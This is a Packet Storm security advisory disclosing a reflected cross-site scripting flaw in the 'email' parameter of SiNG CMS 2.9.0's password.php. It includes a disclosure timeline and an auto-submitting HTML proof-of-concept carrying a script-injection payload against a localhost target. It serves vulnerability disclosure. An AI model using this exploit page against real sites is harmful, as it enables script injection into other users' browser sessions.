SiNG CMS 2.9.0 Cross Site Scripting

2012-08-23T00:00:00
ID PACKETSTORM:115812
Type packetstorm
Reporter LiquidWorm
Modified 2012-08-23T00:00:00

Description

                                        
                                            `<!DOCTYPE html>  
<!--  
  
SiNG cms 2.9.0 (email) Remote XSS POST Injection Vulnerability  
  
  
Vendor: Simple Network Gear  
Product web page: http://www.sing-cms.ru  
Affected version: 2.9.0  
  
Summary: SiNG cms is a free modular Content Management System open  
source, based on a bunch of PHP / MySQL and intended use of the web  
server Apache.  
  
Desc: The application is prone to a reflected cross-site scripting  
vulnerability due to a failure to properly sanitize user-supplied  
input to the 'email' POST parameter in the 'password.php' script.  
Attackers can exploit this weakness to execute arbitrary HTML and  
script code in a user's browser session.  
  
Tested on: Microsoft Windows 7 Ultimate SP1 (EN)  
Apache 2.4.2 (Win32)  
PHP 5.4.4  
MySQL 5.5.25a  
  
  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
@zeroscience  
  
  
Vendor status:  
  
[20.08.2012] Vulnerability discovered.  
[20.08.2012] Initial contact with the vendor.  
[22.08.2012] No response from the vendor.  
[23.08.2012] Public security advisory released.  
  
  
Advisory ID: ZSL-2012-5097  
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5097.php  
  
  
20.08.2012  
  
-->  
  
  
<html>  
<head>  
<title>SiNG cms 2.9.0 (email) Remote XSS POST Injection Vulnerability</title>  
</head>  
<body>  
<form name="email" method="post" action="http://localhost/singcms/password.php">  
<input type="hidden" name="email" value='"><script>alert("XSS");</script>' />  
<input type="hidden" name="send" value="Send password" />  
</form>  
<script type="text/javascript">  
document.email.submit();  
</script>  
</body>  
</html>  
`